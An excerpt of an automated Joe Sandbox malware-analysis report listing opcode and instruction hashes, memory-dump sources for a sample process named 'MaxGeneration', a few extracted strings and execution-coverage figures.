                                                                        • Opcode ID: 65594c84a273340fbad435a064201b5d229aa4d82f9676a8ddab7fad14556a7d
                                                                        • Instruction ID: 6495ab3a914d063e9e431da9138631a0e6e8cc742b15137bf174c61a72a74731
                                                                        • Opcode Fuzzy Hash: 65594c84a273340fbad435a064201b5d229aa4d82f9676a8ddab7fad14556a7d
                                                                        • Instruction Fuzzy Hash: 0901F6B4E05108DFDB24DFA9D590A9DBBB2FB89700F21816ED505A3345DB306D41CF41
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8920ab2a486c186afb7413bd73e7562a9789fc2e29f0ffd10cad77ff7bc4fba0
                                                                        • Instruction ID: 34adf10314d5cd3273ca0dbc84ecf6936c7352c8fed2ca854514e83c564d4abb
                                                                        • Opcode Fuzzy Hash: 8920ab2a486c186afb7413bd73e7562a9789fc2e29f0ffd10cad77ff7bc4fba0
                                                                        • Instruction Fuzzy Hash: 00F06DB1915241DFDB02CB24C958B687BB0EF56314B1444CDD441CB2A2D77A5885CF01
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fd63a6b8473f21834124974cea133a5f37ff416750efc530cf2a6599912e42c
                                                                        • Instruction ID: 61e118076f61ba7fc7a460d8c8f9c832d0d66fa1e5fea5a3661155ddedf9ca0b
                                                                        • Opcode Fuzzy Hash: 9fd63a6b8473f21834124974cea133a5f37ff416750efc530cf2a6599912e42c
                                                                        • Instruction Fuzzy Hash: 06F08234918248BBCB51CB94E5405ACFF74AB45314F14809AEC9427241C7315792EB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7c8d9060660790215c969afd26ac0fd35074b8df49bd1d75370245f4aae7a4d
                                                                        • Instruction ID: 967bad5b6ff37f277264ab17a7ee1e4305b42a4698bfc21ad5bbbd6c27b6061d
                                                                        • Opcode Fuzzy Hash: a7c8d9060660790215c969afd26ac0fd35074b8df49bd1d75370245f4aae7a4d
                                                                        • Instruction Fuzzy Hash: 3EF05874909348EFCB01CBA5D8006A8BFB5EB46214F14C1EEE844A7352D6369A46EB55
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e29f9561ad22eba7b16bc8e2f579b6024a89c9e84ac8ecbd97b4d268cef03e12
                                                                        • Instruction ID: 504335d12c6c6cc668b79218c76f08ce7faf13ac4c84d4e14a56ad719e97f492
                                                                        • Opcode Fuzzy Hash: e29f9561ad22eba7b16bc8e2f579b6024a89c9e84ac8ecbd97b4d268cef03e12
                                                                        • Instruction Fuzzy Hash: 1FF0F47990A229DFEB60CF68C599BE87BF5FB09711F1040E6D109A2202D7789AC68F11
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54ab1e0ffb4172d61858fe5a0fdfef8a7d435c0d13a92e7321a572ae37ae25e7
                                                                        • Instruction ID: 16a74f8946de41a3bfd069cf630117be9cd9b6d88fe998bd81a2c252ba7f74c3
                                                                        • Opcode Fuzzy Hash: 54ab1e0ffb4172d61858fe5a0fdfef8a7d435c0d13a92e7321a572ae37ae25e7
                                                                        • Instruction Fuzzy Hash: 6CE06D34909108ABC704CFA4E8817A9BFB4EB41310F1091AAE80997390DA719D42DB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afc6a703ea1dcbe7ba665f70a4a85474285dda5b1128e47584c1efa6ed90d837
                                                                        • Instruction ID: 1bce71baffa68292ff8b96e6c8bafe7bd21cea7aa9118a0fa8dcb93db0a43858
                                                                        • Opcode Fuzzy Hash: afc6a703ea1dcbe7ba665f70a4a85474285dda5b1128e47584c1efa6ed90d837
                                                                        • Instruction Fuzzy Hash: D1E039B4D09149EBC744DA94D4817ACBBB4AB44204F14C0AAE808A7385D7319B02DB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6b8b4ef1bcee079545f1065a914d2470886e822eaf8a5d015675c5029b9f040
                                                                        • Instruction ID: 784d70c19724491816e85a4508aabb9e016faad5ec6dc29e1796ff87e0c473ac
                                                                        • Opcode Fuzzy Hash: c6b8b4ef1bcee079545f1065a914d2470886e822eaf8a5d015675c5029b9f040
                                                                        • Instruction Fuzzy Hash: DDE0D878508108E7C704DEA4D8817ECBB75FB45324F209199AC4923341C6356E07DB55
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c38fc711f9c1db8ee522f05d1a6134dbc3124a2a4b4fb6d12feea9ab3235631
                                                                        • Instruction ID: 1b058548f8427d9b8595b204fa3c996abd113cd5be0378240803e3cee7c1f2d8
                                                                        • Opcode Fuzzy Hash: 7c38fc711f9c1db8ee522f05d1a6134dbc3124a2a4b4fb6d12feea9ab3235631
                                                                        • Instruction Fuzzy Hash: F4E0D83850810CE7C744CA94DD85BECBB79EB40305F14C299DC4963340CB319E42DB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d786e9482b82657e68047f26349c79aac87f362a998e4d1f416e8ebcd6a69c18
                                                                        • Instruction ID: cdb9ee3843ada5e7ac851276a1a1985b5923464bbadd59855feaef6bde2390cf
                                                                        • Opcode Fuzzy Hash: d786e9482b82657e68047f26349c79aac87f362a998e4d1f416e8ebcd6a69c18
                                                                        • Instruction Fuzzy Hash: 77F0E5B590D348ABC745DBA4D4416ACBFB8AB09300F04C0DAE88467282C6309A81DBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ff0d33fcc7674a59cceee71b4486f903dc10e7ba6e16bac76c695fab3d26231
                                                                        • Instruction ID: 3e30b7e2fc64264a215f8012113751525894e3e7a6c450d613b7552ccae532e5
                                                                        • Opcode Fuzzy Hash: 6ff0d33fcc7674a59cceee71b4486f903dc10e7ba6e16bac76c695fab3d26231
                                                                        • Instruction Fuzzy Hash: B6E0D87890910CABC704CE94E4857E8B7B4EB55315F1491E99C0923341CA355947DB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a833479ebfc6b7282971e54c2267778c447ade7f0b2cca3a805cb8fd16f7370a
                                                                        • Instruction ID: 52adf43acc06654a5b1191b2e2851dc0ad2e3d4aa9d35f2423781b4674a83b1e
                                                                        • Opcode Fuzzy Hash: a833479ebfc6b7282971e54c2267778c447ade7f0b2cca3a805cb8fd16f7370a
                                                                        • Instruction Fuzzy Hash: CEF0653450D288AFC701DBF4D8505D87F72AB46214F14C0DFD8489B393C6718A86C782
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5314ee616c937032aa42d089f90e0bea0aca7bbb4210718ff262868289e6a5b9
                                                                        • Instruction ID: 407a201e3bc0274249bc4650541a68dd90b41f35b318400c622f2b16a2e88cc3
                                                                        • Opcode Fuzzy Hash: 5314ee616c937032aa42d089f90e0bea0aca7bbb4210718ff262868289e6a5b9
                                                                        • Instruction Fuzzy Hash: FBF0F978D01118EFEB54DF54E890B9DBBB2FB49300F50819AE449A3344DB345E85CF52
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 714b2866f8166c629fc56dde29edb56e0f5b97275595f316a1868de2470a495f
                                                                        • Instruction ID: e55e80dd090005a761798707e7b2aba4b93aef86404ded45d47ec50c13b47ec1
                                                                        • Opcode Fuzzy Hash: 714b2866f8166c629fc56dde29edb56e0f5b97275595f316a1868de2470a495f
                                                                        • Instruction Fuzzy Hash: 73E0927490D248ABCB40DBA8E9416A9BF74EB42304F1491DED849173A2C6315A42DB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 149f135bcaf1688a2775b98ccf53e05a6770441d1ed011475e10b8d5358bd466
                                                                        • Instruction ID: e3cff26123aac96b92557201a13ac9209c4fef9fc7cae797846aa4f289a0fa4f
                                                                        • Opcode Fuzzy Hash: 149f135bcaf1688a2775b98ccf53e05a6770441d1ed011475e10b8d5358bd466
                                                                        • Instruction Fuzzy Hash: CDF0B274904218DBDBA0DF24C890AD9B7B5EB89300F5081EA880DA7344DB346E858F81
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 485b6c825174e9020f762cf32406d473b366551be736cb9b62620043372be9a5
                                                                        • Instruction ID: 7a1364231e1e5f52c10deee29bef6b60a62f22d98180202c167063a33b2e3238
                                                                        • Opcode Fuzzy Hash: 485b6c825174e9020f762cf32406d473b366551be736cb9b62620043372be9a5
                                                                        • Instruction Fuzzy Hash: AAE092345092089BC701DBA8E4807ACBF78EB41314F1481EAD84417341C7325A16DB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction ID: 83305446917f4d8fdb24ac156dd25be388c731e1a27162b4797702bc53754599
                                                                        • Opcode Fuzzy Hash: a88aa093cabdec686bd647fdfc5ea27bb5b1b923f32a1aa3b54aadf37e3ef026
                                                                        • Instruction Fuzzy Hash: 9BE0E53590910CEBCB05DFA4E940AEDBB76FB49314F10D19AFC0527351C7329AA2EBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0013fe026d5fa23241b81ba5807833647c18edd5a1ba89d82275dee943e2d27a
                                                                        • Instruction ID: f4a23a11726839dc3b755d645067ccaf95edd9bb5d6f67062de9cf8224b7a674
                                                                        • Opcode Fuzzy Hash: 0013fe026d5fa23241b81ba5807833647c18edd5a1ba89d82275dee943e2d27a
                                                                        • Instruction Fuzzy Hash: A8E0C2B5509109ABC3E8CA94D942BE6B778E705664F1890D9E808D73D1EA329E02CBC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1845dfb63cf4b2649595d9b1ef1829416d25aa5079b15f416ba2cbb8ca7cbafb
                                                                        • Instruction ID: 707c924b0f0c8284913233ff389aa6f0b88090b08e819b4c690efa68303133da
                                                                        • Opcode Fuzzy Hash: 1845dfb63cf4b2649595d9b1ef1829416d25aa5079b15f416ba2cbb8ca7cbafb
                                                                        • Instruction Fuzzy Hash: 41E0C2B490910CEBC704DF94E4459ACFBB8EB45305F14D19CEC0863341DB329E42DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4f0c18ea88218077e894d0b50736b598200b2dacc66d1ff7bbdf363e44a96ab
                                                                        • Instruction ID: 6dd604a15153015373ec134306078896aecb4c2076b69fdbebd95fa590528f9b
                                                                        • Opcode Fuzzy Hash: b4f0c18ea88218077e894d0b50736b598200b2dacc66d1ff7bbdf363e44a96ab
                                                                        • Instruction Fuzzy Hash: 4AE05BF194110DFBD740FFF4D90069E77F9EB45210F0055ADD40993550EE354A51E796
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ec4ea8aa1909d55a41c02e66d215a559ee52adad10c753f9284ba6b43f5b597
                                                                        • Instruction ID: fb158b8c79f5e2204f4aa75973f1f82ac379ca9c4eaa4ed47eafe61a0f529060
                                                                        • Opcode Fuzzy Hash: 6ec4ea8aa1909d55a41c02e66d215a559ee52adad10c753f9284ba6b43f5b597
                                                                        • Instruction Fuzzy Hash: 99E0E5B490021C9BDB22CF54C850BDE7BF9BB4D300F0041D6E549A3244D6349E808F61
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 016b45e07d3ab57c9307b20c8d780952954dd819c92a954d011442667a916465
                                                                        • Instruction ID: a89718d999a9532efad7629ec1f56866c1e2dd0c94a72751f1114535ada294c5
                                                                        • Opcode Fuzzy Hash: 016b45e07d3ab57c9307b20c8d780952954dd819c92a954d011442667a916465
                                                                        • Instruction Fuzzy Hash: 64E0C234A0920CEFC740EBA8D5406ACBFB4EB05205F1080DED80893381DB319E42DB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 016b45e07d3ab57c9307b20c8d780952954dd819c92a954d011442667a916465
                                                                        • Instruction ID: 38c64273596c9de04d6bad58d2b77c3865f613525918fb3539c27937041b1848
                                                                        • Opcode Fuzzy Hash: 016b45e07d3ab57c9307b20c8d780952954dd819c92a954d011442667a916465
                                                                        • Instruction Fuzzy Hash: 4DE0C23090910CEFCB40DBA8D4807ECBFB4AB05604F1080DED84863381DB319F46DB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c829aeacd09d668cff80a39b6755a7abb11c3265bdf41206ded2fe933d6abe0
                                                                        • Instruction ID: 262937ba920b84e3d9a5bce46fc8452a368dbff6811e1a4f6b287af98bc40fb1
                                                                        • Opcode Fuzzy Hash: 1c829aeacd09d668cff80a39b6755a7abb11c3265bdf41206ded2fe933d6abe0
                                                                        • Instruction Fuzzy Hash: C4D0A73450D20CEBC748CB94D440BA9B7BDEB45318F1090DDA809D3395CB729E02DB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adb8092a22f814a66b7b8fe61d5cb6bd47760336fa4dfd6f5e41d201ebba0a11
                                                                        • Instruction ID: eb6a9821b197bf534f3fff3587e46de64432857b8990dc0a3266aef47d3fdaf3
                                                                        • Opcode Fuzzy Hash: adb8092a22f814a66b7b8fe61d5cb6bd47760336fa4dfd6f5e41d201ebba0a11
                                                                        • Instruction Fuzzy Hash: BCE0EC74D14108DFEF04DFA8E044BDCB7B1EB45304F518066E51AA3241CB349E90CF02
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 450e93d6044ecbba7c2d821afc6794f8fda3717ebe624c16bb66830f3118ec27
                                                                        • Instruction ID: 5cc0d500b526540c1484e969b55f41c82016e4f61c30db41ec761554d852d220
                                                                        • Opcode Fuzzy Hash: 450e93d6044ecbba7c2d821afc6794f8fda3717ebe624c16bb66830f3118ec27
                                                                        • Instruction Fuzzy Hash: 43D02E7011420ACFE301AB64C80CB6A36B4EF4A305F0880A8D00D87282EEB908868F63
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1ff0c4dfdb36272294b2f41ffbc6c3d8590515345bdd7886c0befe92320ed21
                                                                        • Instruction ID: b7e6f5fd82956853b3b8eec6f13cad843552845d35e083d9261a5d97b4af2040
                                                                        • Opcode Fuzzy Hash: e1ff0c4dfdb36272294b2f41ffbc6c3d8590515345bdd7886c0befe92320ed21
                                                                        • Instruction Fuzzy Hash: E8D0127448F3C06FC7830774A82A2E43FB89B43204F1980DBD8848A5A39676060A8762
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1916093355.0000000007F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7f00000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22d5791f69ca0fd89b6016b94e176574e90e4ef36e82248f980ca16bab901275
                                                                        • Instruction ID: 50b37a24c25ae649ed8b66201aadfb228b3e77727d6818d85a165413c6367d29
                                                                        • Opcode Fuzzy Hash: 22d5791f69ca0fd89b6016b94e176574e90e4ef36e82248f980ca16bab901275
                                                                        • Instruction Fuzzy Hash: 5DC02BB00CF64D83C1202288B04C3F433ECB303337F043400780C028E18B7044C0C245
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7cb01048c223ed63c3a87ba445a3893d92dfdb4550bebfe6f43ce6e4d969f23
                                                                        • Instruction ID: f4a294cc2b784fa557f70c9d359d64d1be725f465ad3ac5d3c8f39f5900c3277
                                                                        • Opcode Fuzzy Hash: d7cb01048c223ed63c3a87ba445a3893d92dfdb4550bebfe6f43ce6e4d969f23
                                                                        • Instruction Fuzzy Hash: 83D0CA7490422DCFEB20DF24C888B99BBF2BB44304F1086DA849CA3380EB700E84DF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9fa37d90481f267323fc31ac35e0971be68ee10b3a144fd18131bf5b26c42a6
                                                                        • Instruction ID: b3a7d63966ea931ef900867aeb53359ddff89010129160d21b411b6efff7ffd2
                                                                        • Opcode Fuzzy Hash: c9fa37d90481f267323fc31ac35e0971be68ee10b3a144fd18131bf5b26c42a6
                                                                        • Instruction Fuzzy Hash: 0E90023104870D9B865027957409555B77C95445157C04055A50D415065B6665144695
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: T$TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-3815819399
                                                                        • Opcode ID: ae1fd235ca2d100650ab781f3db622f1c570083c2e8107c1eb88f78bddd9b20f
                                                                        • Instruction ID: cb84d4f99d8340b6f97d16b0302967b79d2e0137a63b81479a7615c57d573e26
                                                                        • Opcode Fuzzy Hash: ae1fd235ca2d100650ab781f3db622f1c570083c2e8107c1eb88f78bddd9b20f
                                                                        • Instruction Fuzzy Hash: 05B01230510204CE8F16DE00C1C0468BBB0FF8164031080EEC0031E027C730C9C7DF02
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction ID: c1a0f9041b7c0039c7b2b4c88ae140739e516e59e48d3311a5621c90adb28742
                                                                        • Opcode Fuzzy Hash: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction Fuzzy Hash: 27B09270112200CE8B06EA108184420B7B0FB8164031080AEC0030E02AC7308987EA06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction ID: c3a856d7fbe97646d2c63bb7b4bda02c105ed6f147ad144af62fc05b07860ff3
                                                                        • Opcode Fuzzy Hash: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction Fuzzy Hash: F8B0926141E784CEC7039A9148D12607E506BA2281B18C0EA84850E08BC1A08885E721
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction ID: b1a9230496f55c2439ed7e1c8f9b34f1328800774486278cf02a825537cd60e1
                                                                        • Opcode Fuzzy Hash: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction Fuzzy Hash: 3FB09260805349CBDB118E8182D0340BB60BB60248F18C3B9C8480D807C328C58697A0

                                                                        Execution Graph

                                                                        Execution Coverage:7.7%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:78
                                                                        Total number of Limit Nodes:10
